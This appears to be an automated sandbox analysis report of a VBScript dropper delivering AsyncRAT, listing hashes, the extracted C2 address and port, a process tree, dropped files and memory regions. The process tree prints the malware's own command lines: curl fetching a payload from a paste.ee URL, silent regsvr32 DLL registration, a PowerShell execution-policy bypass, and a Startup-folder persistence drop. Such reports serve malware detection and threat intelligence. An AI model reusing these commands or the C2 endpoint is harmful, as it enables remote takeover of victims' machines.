Analysis

  • max time kernel
    27s
  • max time network
    35s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231023-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-11-2023 07:53

General

  • Target

    Lana_Rohder_IMG.vbs

  • Size

    110KB

  • MD5

    fe59dd4ed289fd64e23704bd445d83c6

  • SHA1

    895f78cf82753441c83d8acc6028f2af9c9004d2

  • SHA256

    30d7035471759444c3cc6dc0dcab54245cce7c417382fb56d41d42256dd0c590

  • SHA512

    475a65b9133f7795cd0df591821cfe2614e5d11e2a947de73fba2dd2dbc02903ffebbf1e4ff3e8f9f680d14e39cb939287f5071a7910d9ff903122bf0c328bf4

  • SSDEEP

    3072:n03pXdSenFkCum03pvfpp03pp03pp03pA:kSeQr5

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

FUD

C2

141.95.84.40:4291

Mutex

acw2

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Async RAT payload 2 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Loads dropped DLL 5 IoCs
  • Registers COM server for autorun 1 TTPs 8 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Modifies registry class 20 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 50 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Lana_Rohder_IMG.vbs"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:4128
    • C:\Windows\System32\curl.exe
      curl -s https://paste.ee/r/1ef2O
      2⤵
        PID:4852
      • C:\Windows\SYSWOW64\WSCRIPT.EXE
        "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\Admin\AppData\Local\Temp\Lana_Rohder_IMG.vbs"
        2⤵
        • Checks computer location settings
        • Drops startup file
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:5108
        • C:\Windows\SysWOW64\curl.exe
          curl -s https://paste.ee/r/1ef2O
          3⤵
            PID:4084
          • C:\Windows\SysWOW64\regsvr32.exe
            "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
            3⤵
            • Loads dropped DLL
            • Registers COM server for autorun
            • Modifies registry class
            PID:1776
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            3⤵
              PID:2984
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 152
                4⤵
                • Program crash
                PID:524
            • C:\Windows\SysWOW64\regsvr32.exe
              "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
              3⤵
              • Loads dropped DLL
              • Registers COM server for autorun
              • Modifies registry class
              PID:2996
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              3⤵
                PID:1408
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 80
                  4⤵
                  • Program crash
                  PID:564
              • C:\Windows\SysWOW64\regsvr32.exe
                "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
                3⤵
                • Loads dropped DLL
                • Registers COM server for autorun
                • Modifies registry class
                PID:4460
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                3⤵
                • Checks computer location settings
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:480
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\Mia_Khalifa_IMG.vbs"' & exit
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:648
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\Mia_Khalifa_IMG.vbs"'
                    5⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4308
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Mia_Khalifa_IMG.vbs"
                      6⤵
                        PID:4740
                        • C:\Windows\SysWOW64\regsvr32.exe
                          "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
                          7⤵
                            PID:3572
                  • C:\Windows\SysWOW64\regsvr32.exe
                    "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
                    3⤵
                    • Loads dropped DLL
                    • Registers COM server for autorun
                    • Modifies registry class
                    PID:3448
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    3⤵
                      PID:2268
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 80
                        4⤵
                        • Program crash
                        PID:2328
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2984 -ip 2984
                  1⤵
                    PID:880
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1408 -ip 1408
                    1⤵
                      PID:748
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2268 -ip 2268
                      1⤵
                        PID:4748

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Temp\Mia_Khalifa_IMG.vbs

                        Filesize

                        1.1MB

                        MD5

                        2330aad1ffc62db601e2dfaa8101e7ca

                        SHA1

                        d3fabdf18a86a1c0042d7cfdfc5375225d313cf8

                        SHA256

                        c6754976b3c1f46e2b93a6266742a238138f6775127ae824feca5fae560f14c4

                        SHA512

                        1f0e1d940debef24bc2096446928096aa8bee9c7fb896ad5cbe8d0b2bdf7c7c75aff5320499e76c3d9fc12c36745a0210c05b566c1ec9ada836ee72f275fd3c4

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ytru45c.o01.ps1

                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      • C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll

                        Filesize

                        13KB

                        MD5

                        e0b8dfd17b8e7de760b273d18e58b142

                        SHA1

                        801509fb6783c9e57edc67a72dde3c62080ffbaf

                        SHA256

                        4ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379

                        SHA512

                        443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b

                      • C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll

                        Filesize

                        13KB

                        MD5

                        e0b8dfd17b8e7de760b273d18e58b142

                        SHA1

                        801509fb6783c9e57edc67a72dde3c62080ffbaf

                        SHA256

                        4ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379

                        SHA512

                        443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b

                      • C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll

                        Filesize

                        13KB

                        MD5

                        e0b8dfd17b8e7de760b273d18e58b142

                        SHA1

                        801509fb6783c9e57edc67a72dde3c62080ffbaf

                        SHA256

                        4ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379

                        SHA512

                        443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b

                      • C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll

                        Filesize

                        13KB

                        MD5

                        e0b8dfd17b8e7de760b273d18e58b142

                        SHA1

                        801509fb6783c9e57edc67a72dde3c62080ffbaf

                        SHA256

                        4ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379

                        SHA512

                        443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b

                      • C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll

                        Filesize

                        13KB

                        MD5

                        e0b8dfd17b8e7de760b273d18e58b142

                        SHA1

                        801509fb6783c9e57edc67a72dde3c62080ffbaf

                        SHA256

                        4ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379

                        SHA512

                        443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b

                      • C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll

                        Filesize

                        13KB

                        MD5

                        e0b8dfd17b8e7de760b273d18e58b142

                        SHA1

                        801509fb6783c9e57edc67a72dde3c62080ffbaf

                        SHA256

                        4ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379

                        SHA512

                        443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b

                      • C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll

                        Filesize

                        13KB

                        MD5

                        e0b8dfd17b8e7de760b273d18e58b142

                        SHA1

                        801509fb6783c9e57edc67a72dde3c62080ffbaf

                        SHA256

                        4ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379

                        SHA512

                        443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b

                      • C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll

                        Filesize

                        13KB

                        MD5

                        e0b8dfd17b8e7de760b273d18e58b142

                        SHA1

                        801509fb6783c9e57edc67a72dde3c62080ffbaf

                        SHA256

                        4ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379

                        SHA512

                        443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b

                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Lana_Rohder_IMG.vbs

                        Filesize

                        110KB

                        MD5

                        fe59dd4ed289fd64e23704bd445d83c6

                        SHA1

                        895f78cf82753441c83d8acc6028f2af9c9004d2

                        SHA256

                        30d7035471759444c3cc6dc0dcab54245cce7c417382fb56d41d42256dd0c590

                        SHA512

                        475a65b9133f7795cd0df591821cfe2614e5d11e2a947de73fba2dd2dbc02903ffebbf1e4ff3e8f9f680d14e39cb939287f5071a7910d9ff903122bf0c328bf4

                      • memory/480-25-0x0000000006740000-0x0000000006CE4000-memory.dmp

                        Filesize

                        5.6MB

                      • memory/480-18-0x0000000072620000-0x0000000072DD0000-memory.dmp

                        Filesize

                        7.7MB

                      • memory/480-21-0x0000000005800000-0x0000000005810000-memory.dmp

                        Filesize

                        64KB

                      • memory/480-24-0x00000000060F0000-0x000000000618C000-memory.dmp

                        Filesize

                        624KB

                      • memory/480-26-0x0000000006200000-0x0000000006266000-memory.dmp

                        Filesize

                        408KB

                      • memory/480-27-0x00000000072F0000-0x0000000007366000-memory.dmp

                        Filesize

                        472KB

                      • memory/480-28-0x00000000064B0000-0x00000000064BC000-memory.dmp

                        Filesize

                        48KB

                      • memory/480-29-0x0000000007290000-0x00000000072AE000-memory.dmp

                        Filesize

                        120KB

                      • memory/2984-10-0x0000000000400000-0x0000000000412000-memory.dmp

                        Filesize

                        72KB

                      • memory/4308-46-0x00000000058C0000-0x0000000005926000-memory.dmp

                        Filesize

                        408KB

                      • memory/4308-48-0x0000000005E50000-0x0000000005E6E000-memory.dmp

                        Filesize

                        120KB

                      • memory/4308-34-0x00000000025E0000-0x00000000025F0000-memory.dmp

                        Filesize

                        64KB

                      • memory/4308-33-0x00000000025E0000-0x00000000025F0000-memory.dmp

                        Filesize

                        64KB

                      • memory/4308-35-0x0000000004F70000-0x0000000005598000-memory.dmp

                        Filesize

                        6.2MB

                      • memory/4308-41-0x00000000056B0000-0x00000000056D2000-memory.dmp

                        Filesize

                        136KB

                      • memory/4308-31-0x0000000002510000-0x0000000002546000-memory.dmp

                        Filesize

                        216KB

                      • memory/4308-57-0x0000000072620000-0x0000000072DD0000-memory.dmp

                        Filesize

                        7.7MB

                      • memory/4308-47-0x0000000005A10000-0x0000000005D64000-memory.dmp

                        Filesize

                        3.3MB

                      • memory/4308-32-0x0000000072620000-0x0000000072DD0000-memory.dmp

                        Filesize

                        7.7MB

                      • memory/4308-49-0x0000000005EF0000-0x0000000005F3C000-memory.dmp

                        Filesize

                        304KB

                      • memory/4308-50-0x00000000025E0000-0x00000000025F0000-memory.dmp

                        Filesize

                        64KB

                      • memory/4308-51-0x00000000063A0000-0x0000000006436000-memory.dmp

                        Filesize

                        600KB

                      • memory/4308-52-0x0000000006320000-0x000000000633A000-memory.dmp

                        Filesize

                        104KB

                      • memory/4308-53-0x0000000006370000-0x0000000006392000-memory.dmp

                        Filesize

                        136KB

                      • memory/5108-16-0x00000000046E0000-0x00000000046E1000-memory.dmp

                        Filesize

                        4KB

                      • memory/5108-20-0x00000000047A0000-0x00000000047A1000-memory.dmp

                        Filesize

                        4KB

                      • memory/5108-12-0x0000000004650000-0x0000000004651000-memory.dmp

                        Filesize

                        4KB

                      • memory/5108-9-0x00000000040C0000-0x00000000040C1000-memory.dmp

                        Filesize

                        4KB